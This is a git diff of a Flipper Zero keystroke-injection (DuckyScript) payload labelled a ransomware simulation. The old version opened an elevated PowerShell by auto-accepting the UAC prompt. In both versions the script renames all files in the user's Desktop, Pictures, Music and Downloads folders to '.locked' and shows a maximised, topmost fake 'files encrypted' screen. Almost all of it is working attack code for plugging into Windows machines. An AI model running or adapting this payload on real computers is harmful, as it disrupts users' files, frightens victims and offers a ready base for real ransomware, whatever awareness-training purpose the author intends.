Update 1. RansomwareSimulation

1. RansomwareSimulation

@@ -1,30 +1,65 @@
-REM #########################################################################################################################
-REM ################                    This script was created by github.com/MarkCyber                          ############
-REM ################        This script is intended to act as a simulation of a ransomware attack                ############
-REM ################   This script will change all file extensions to .locked rather than encrypting the files   ############
-REM #########################################################################################################################
-
-
-REM Set delay for flipper
-DELAY 500
+REM This script was created by github.com/MarkCyber
+REM This script simulates a ransomware attack by renaming files and displaying a message.
+DELAY 1000
 GUI r
-DELAY 100
-STRING powershell -Command "Start-Process powershell -Verb runAs"
-ENTER
-DELAY 500
-ALT y
-DELAY 500
-
-REM Rename files in specified locations to append .locked to every file
-STRING $locations = @('MyDocuments', 'Desktop', 'Pictures', 'Music'); $errorOccurred = $false; foreach ($loc in $locations) { $path = [Environment]::GetFolderPath($loc); $files = Get-ChildItem -Path $path -File; foreach ($file in $files) { $null = $file | Rename-Item -NewName {$file.Name + '.locked'}; if (-not $?){ $errorOccurred = $true } } }
-STRING IF ($errorOccurred) { exit }
-ENTER
 DELAY 1000
-
+STRING powershell
+ENTER
+DELAY 3000
+REM Define the locations using correct SpecialFolder enumerations
+STRING $folders = @(
+ENTER
+DELAY 500
+STRING [System.Environment+SpecialFolder]::Desktop,
+ENTER
+DELAY 500
+STRING [System.Environment+SpecialFolder]::MyPictures,
+ENTER
+DELAY 500
+STRING [System.Environment+SpecialFolder]::MyMusic,
+ENTER
+DELAY 500
+STRING [System.Environment+SpecialFolder]::Downloads
+ENTER
+DELAY 500
+STRING )
+ENTER
+DELAY 500
+REM Iterate over each location
+STRING foreach ($folder in $folders) {
+ENTER
+DELAY 500
+STRING $path = [Environment]::GetFolderPath($folder)
+ENTER
+DELAY 500
+REM Get all files in the path and rename them
+STRING Get-ChildItem -Path $path -File | ForEach-Object { Rename-Item -Path $_.FullName -NewName ($_.Name + '.locked') }
+ENTER
+DELAY 500
+STRING }
+ENTER
+DELAY 2000
 REM Display ransomware message
-STRING Add-Type -AssemblyName PresentationFramework; $Window = New-Object System.Windows.Window; $Window.WindowStartupLocation = 'CenterScreen'; $Window.WindowState = 'Maximized'; $Window.Topmost = $true; $Window.Content = 'Your files have been encrypted. This is a simulation. Please contact your IT support team.'; $Window.ShowDialog()
+STRING Add-Type -AssemblyName PresentationFramework
 ENTER
-DELAY 1000
-
+DELAY 500
+STRING $Window = New-Object System.Windows.Window
+ENTER
+DELAY 500
+STRING $Window.WindowStartupLocation = 'CenterScreen'
+ENTER
+DELAY 500
+STRING $Window.WindowState = 'Maximized'
+ENTER
+DELAY 500
+STRING $Window.Topmost = $true
+ENTER
+DELAY 500
+STRING $Window.Content = 'Your files have been encrypted. This is a simulation. Please contact your IT support team.'
+ENTER
+DELAY 500
+STRING $Window.ShowDialog()
+ENTER
+DELAY 2000
 STRING exit
 ENTER